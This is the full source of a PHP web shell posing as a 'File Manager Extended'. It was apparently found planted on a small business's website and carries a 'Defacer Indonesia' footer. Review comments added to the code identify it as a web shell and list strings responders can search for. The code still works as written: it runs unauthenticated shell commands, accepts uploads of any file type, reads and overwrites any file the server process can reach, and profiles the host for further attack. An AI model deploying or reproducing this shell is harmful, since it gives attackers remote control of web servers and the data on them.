whoami7 - Manager
files >> //home/fresvfqn/24hourwaterdamagerestorationlongisland.com/bajk/test/cot.php
<?php
// Simple PHP File Manager with extended features
//
// NOTE(review): despite the title, this script has the shape of a web shell.
// Nothing in the file performs an authentication, session or CSRF check, so
// any client that can reach the URL can:
//   - list any directory the PHP process can read (GET `path`)
//   - view, download or open for editing a file there (GET `view`, `download`, `edit`)
//   - upload, create or overwrite files there (POST `file`, `new_folder`,
//     `new_file`, `edit_file` + `edit_content`)
//   - run an arbitrary shell command (POST `command`)
// The HTML template additionally calls shell_exec() four times on every page
// load to print host details (uname, /etc/named.conf zone count, available
// compilers and download tools) next to PHP settings such as
// disable_functions and open_basedir.
//
// For responders: the request parameter names above, the page title
// "File Manager Extended" and the Indonesian status strings are the
// fixed strings this file exposes for log and content searches. A copy
// found on a server should be handled as evidence of compromise rather
// than as an admin tool to be hardened in place.

// Get current path from GET parameter, default to script directory
// realpath() returns false when the path does not resolve; handled below.
$currentPath = isset($_GET['path']) ? realpath($_GET['path']) : __DIR__;

// Allow navigation up to root directory
$rootDir = DIRECTORY_SEPARATOR; // root path "/"

// Normalize and validate current path
if ($currentPath === false) {
    $currentPath = __DIR__;
}
// NOTE(review): this is not a confinement check. $rootDir is the directory
// separator itself, so on a POSIX host every path realpath() returns already
// starts with it and this fallback does not trigger. The reachable scope is
// therefore whatever file-system permissions (and open_basedir, if set)
// allow the PHP process user.
if (strpos($currentPath, $rootDir) !== 0) {
    $currentPath = __DIR__;
}

// Handle file upload
// basename() only strips directory components from the client-supplied name.
// There is no extension, content-type or size check here, so the file is
// stored under its original name (including a .php name) in $currentPath.
// Status text is Indonesian: "File uploaded successfully" / "Failed to upload file".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $fileName = basename($_FILES['file']['name']);
    $targetFile = $currentPath . DIRECTORY_SEPARATOR . $fileName;
    if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) {
        $uploadMessage = "File berhasil diupload: " . htmlspecialchars($fileName);
    } else {
        $uploadMessage = "Gagal mengupload file.";
    }
}

// Handle create new folder
// Creates a directory named by POST `new_folder` inside $currentPath unless
// something with that name already exists.
// Status text: "Folder created" / "Failed to create folder" / "Folder already exists".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) {
    $newFolderName = basename($_POST['new_folder']);
    $newFolderPath = $currentPath . DIRECTORY_SEPARATOR . $newFolderName;
    if (!file_exists($newFolderPath)) {
        if (mkdir($newFolderPath)) {
            $folderMessage = "Folder berhasil dibuat: " . htmlspecialchars($newFolderName);
        } else {
            $folderMessage = "Gagal membuat folder.";
        }
    } else {
        $folderMessage = "Folder sudah ada.";
    }
}

// Handle create new file
// Creates an empty file named by POST `new_file` inside $currentPath unless
// something with that name already exists.
// Status text: "File created" / "Failed to create file" / "File already exists".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) {
    $newFileName = basename($_POST['new_file']);
    $newFilePath = $currentPath . DIRECTORY_SEPARATOR . $newFileName;
    if (!file_exists($newFilePath)) {
        if (file_put_contents($newFilePath, '') !== false) {
            $fileMessage = "File berhasil dibuat: " . htmlspecialchars($newFileName);
        } else {
            $fileMessage = "Gagal membuat file.";
        }
    } else {
        $fileMessage = "File sudah ada.";
    }
}

// Handle edit file content
// Overwrites an existing regular file in $currentPath with the raw POST
// `edit_content` value; the content is not inspected or restricted.
// Status text: "File saved" / "Failed to save file" / "File not found".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file']) && isset($_POST['edit_content'])) {
    $editFileName = basename($_POST['edit_file']);
    $editFilePath = $currentPath . DIRECTORY_SEPARATOR . $editFileName;
    $editContent = $_POST['edit_content'];
    if (file_exists($editFilePath) && is_file($editFilePath)) {
        if (file_put_contents($editFilePath, $editContent) !== false) {
            $editMessage = "File berhasil disimpan: " . htmlspecialchars($editFileName);
        } else {
            $editMessage = "Gagal menyimpan file.";
        }
    } else {
        $editMessage = "File tidak ditemukan.";
    }
}

// Handle command execution
// Unlike the handlers above, this one does not even check the request method.
$commandOutput = '';
if (isset($_POST['command'])) {
    $command = $_POST['command'];
    // Basic sanitization: allow only safe commands or all if trusted
    // For demo, allow all, but in production, restrict
    // NOTE(review): the two lines above describe sanitisation, but none is
    // implemented: the raw POST value is handed to shell_exec() with stderr
    // merged into stdout. The command runs as the PHP process user. Listing
    // shell_exec in disable_functions would close this path, but not the
    // file read/write handlers in this script.
    $commandOutput = shell_exec($command . ' 2>&1');
}

// Get list of files and directories
// Splits the entries of $currentPath into sub-directories and everything
// else, skipping the "." and ".." entries.
$items = scandir($currentPath);
$dirs = [];
$files = [];
foreach ($items as $item) {
    if ($item === '.' || $item === '..') continue;
    $fullPath = $currentPath . DIRECTORY_SEPARATOR . $item;
    if (is_dir($fullPath)) {
        $dirs[] = $item;
    } else {
        $files[] = $item;
    }
}

// Function to format file size
// Divides $bytes by 1024 until it is below 1024 or the GB unit is reached,
// then returns the value rounded to two decimals followed by the unit.
function formatSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB'];
    $i = 0;
    while ($bytes >= 1024 && $i < 3) {
        $bytes /= 1024;
        $i++;
    }
    return round($bytes, 2) . ' ' . $units[$i];
}

// Function to get parent directory path
// Returns dirname($path), or null when dirname() yields the path itself
// (there is no parent left to go to).
function parentDir($path) {
    $parent = dirname($path);
    if ($parent === $path) {
        return null;
    }
    return $parent;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<title>File Manager Extended</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.container { max-width: 900px; margin: auto; }
.path { background: #f0f0f0; padding: 10px; border-radius: 5px; margin-bottom: 20px; }
.item { padding: 5px 0; border-bottom: 1px solid #eee; }
.dir { color: blue; font-weight: bold; }
.file { color: green; }
.upload, .create, .edit, .command { margin-top: 20px; padding: 20px; border: 1px solid #ccc; border-radius: 5px; }
table { width: 100%; border-collapse: collapse; }
th, td { padding: 8px; text-align: left; border-bottom: 1px solid #ddd; }
th { background-color: #f2f2f2; }
textarea { width: 100%; height: 200px; }
input[type="text"] { width: 300px; }
.message { color: green; }
.error { color: red; }
a { text-decoration: none; }
</style>
</head>
<body>
<div class="container">
<h1>File Manager Extended</h1>
<div class="server-info">
<h2>Server Info</h2>
<pre>
Uname: <?php echo htmlspecialchars(shell_exec('uname -a') ?: 'Unknown'); ?>
User: <?php echo htmlspecialchars(get_current_user()); ?>
Group: <?php echo function_exists('posix_getgid') ? posix_getgid() : 'Unknown'; ?> [ <?php echo htmlspecialchars(get_current_user()); ?> ]
PHP: <?php echo htmlspecialchars(phpversion()); ?> Safe Mode: <?php echo ini_get('safe_mode') ? 'ON' : 'OFF'; ?>
ServerIP: <?php echo htmlspecialchars($_SERVER['SERVER_ADDR'] ?? 'Unknown'); ?> Your IP: <?php echo htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? 'Unknown'); ?>
DateTime: <?php echo date('Y-m-d H:i:s'); ?>
Domains: <?php echo htmlspecialchars(shell_exec('cat /etc/named.conf 2>/dev/null | grep -c "zone"') ?: 'Cant Read [ /etc/named.conf ]'); ?>
HDD: Total:<?php echo formatSize(disk_total_space(__DIR__)); ?> Free:<?php echo formatSize(disk_free_space(__DIR__)); ?> [<?php echo round((disk_free_space(__DIR__) / disk_total_space(__DIR__)) * 100); ?>%]
Useful : <?php echo htmlspecialchars(shell_exec('which gcc c++ ld make php perl ruby tar gzip 2>/dev/null | tr "\n" " "') ?: 'None'); ?><br>
Downloader: <?php echo htmlspecialchars(shell_exec('which wget lynx curl 2>/dev/null | tr "\n" " "') ?: 'None'); ?> <br>
Disable Functions: <?php $df = ini_get('disable_functions'); echo $df ? htmlspecialchars($df) : 'All Functions Accessible'; ?> <br>
CURL : <?php echo extension_loaded('curl') ? 'ON' : 'OFF'; ?> | SSH2 : <?php echo extension_loaded('ssh2') ? 'ON' : 'OFF'; ?> | Magic Quotes : OFF | MySQL : <?php echo extension_loaded('mysql') || extension_loaded('mysqli') || extension_loaded('pdo_mysql') ? 'ON' : 'OFF'; ?> | MSSQL : <?php echo extension_loaded('mssql') || extension_loaded('sqlsrv') ? 'ON' : 'OFF'; ?> | PostgreSQL : <?php echo extension_loaded('pgsql') || extension_loaded('pdo_pgsql') ? 'ON' : 'OFF'; ?> | Oracle : <?php echo extension_loaded('oci8') || extension_loaded('pdo_oci') ? 'ON' : 'OFF'; ?> | CGI : <?php echo php_sapi_name() === 'cgi' ? 'ON' : 'OFF'; ?> <br>
Open_basedir : <?php echo ini_get('open_basedir') ?: 'NONE'; ?> | Safe_mode_exec_dir : <?php echo ini_get('safe_mode_exec_dir') ?: 'NONE'; ?> | Safe_mode_include_dir : <?php echo ini_get('safe_mode_include_dir') ?: 'NONE'; ?> <br>
SoftWare: <?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'); ?> <br>
PWD: <?php echo htmlspecialchars(getcwd()); ?> [ Home Shell ]
</pre>
</div>
<div class="path">
<strong>Path:</strong> <?php echo htmlspecialchars($currentPath); ?>
<?php $parent = parentDir($currentPath); ?>
<?php if ($parent !== null): ?>
| <a href="?path=<?php echo urlencode($parent); ?>">⬆️ Parent Directory</a>
<?php endif; ?>
| <a href="?path=<?php echo urlencode($rootDir); ?>">🏠 Root Directory</a>
</div>
<div class="navigate">
<h2>Navigate to Path</h2>
<form method="GET">
<input type="text" name="path" placeholder="Enter full path" value="<?php echo htmlspecialchars($currentPath); ?>" required>
<button type="submit">Go</button>
</form>
</div>
<?php if (isset($uploadMessage)): ?>
<p class="message"><?php echo $uploadMessage; ?></p>
<?php endif; ?>
<?php if (isset($folderMessage)): ?>
<p class="message"><?php echo $folderMessage; ?></p>
<?php endif; ?>
<?php if (isset($fileMessage)): ?>
<p class="message"><?php echo $fileMessage; ?></p>
<?php endif; ?>
<?php if (isset($editMessage)): ?>
<p class="message"><?php echo $editMessage; ?></p>
<?php endif; ?>
<h2>Directories</h2>
<ul>
<?php foreach ($dirs as $dir): ?>
<li class="item dir">
<a href="?path=<?php echo urlencode($currentPath . DIRECTORY_SEPARATOR . $dir); ?>"> 📁 <?php echo htmlspecialchars($dir); ?> </a>
</li>
<?php endforeach; ?>
</ul>
<h2>Files</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($files as $file): ?>
<tr class="item file">
<td>📄 <?php echo htmlspecialchars($file); ?></td>
<td><?php echo formatSize(filesize($currentPath . DIRECTORY_SEPARATOR . $file)); ?></td>
<td>
<a href="?path=<?php echo urlencode($currentPath); ?>&view=<?php echo urlencode($file); ?>">View</a>
<a href="?path=<?php echo urlencode($currentPath); ?>&download=<?php echo urlencode($file); ?>" download>Download</a>
<a href="?path=<?php echo urlencode($currentPath); ?>&edit=<?php echo urlencode($file); ?>">Edit</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<div class="upload">
<h2>Upload File</h2>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file" required>
<button type="submit">Upload</button>
</form>
</div>
<div class="create">
<h2>Create New Folder</h2>
<form method="POST">
<input type="text" name="new_folder" placeholder="Folder name" required>
<button type="submit">Create Folder</button>
</form>
</div>
<div class="create">
<h2>Create New File</h2>
<form method="POST">
<input type="text" name="new_file" placeholder="File name" required>
<button type="submit">Create File</button>
</form>
</div>
<div class="command">
<h2>Server Info & Command Execution</h2>
<form method="POST">
<input type="text" name="command" placeholder="Enter command" required>
<button type="submit">Run Command</button>
</form>
<?php if ($commandOutput !== ''): ?>
<pre><?php echo htmlspecialchars($commandOutput); ?></pre>
<?php endif; ?>
</div>
</div>
<?php
// Handle view file
// Prints the HTML-escaped contents of a regular file in $currentPath named
// by GET `view`. Combined with the unrestricted `path` parameter, this reads
// any file the PHP process user can read.
if (isset($_GET['view'])) {
    $viewFile = basename($_GET['view']);
    $viewPath = $currentPath . DIRECTORY_SEPARATOR . $viewFile;
    if (file_exists($viewPath) && is_file($viewPath)) {
        echo '<div class="container"><h2>Viewing: ' . htmlspecialchars($viewFile) . '</h2><pre>' . htmlspecialchars(file_get_contents($viewPath)) . '</pre></div>';
    }
}

// Handle edit file form
// Renders a form pre-filled with the file's current contents; submitting it
// sends `edit_file` and `edit_content` to the POST handler near the top of
// this script. "File tidak ditemukan." means "File not found".
if (isset($_GET['edit'])) {
    $editFile = basename($_GET['edit']);
    $editFilePath = $currentPath . DIRECTORY_SEPARATOR . $editFile;
    if (file_exists($editFilePath) && is_file($editFilePath)) {
        $content = file_get_contents($editFilePath);
        ?>
        <div class="container edit">
        <h2>Edit File: <?php echo htmlspecialchars($editFile); ?></h2>
        <form method="POST">
        <input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($editFile); ?>">
        <textarea name="edit_content"><?php echo htmlspecialchars($content); ?></textarea><br>
        <button type="submit">Save</button>
        </form>
        </div>
        <?php
    } else {
        echo '<p class="error">File tidak ditemukan.</p>';
    }
}

// Handle download
// Sends a regular file from $currentPath, named by GET `download`, as an
// octet-stream attachment and then stops the script.
if (isset($_GET['download'])) {
    $downloadFile = basename($_GET['download']);
    $downloadPath = $currentPath . DIRECTORY_SEPARATOR . $downloadFile;
    if (file_exists($downloadPath) && is_file($downloadPath)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $downloadFile . '"');
        readfile($downloadPath);
        exit;
    }
}
?>
</body>
</html>
Copyright ©2021 || Defacer Indonesia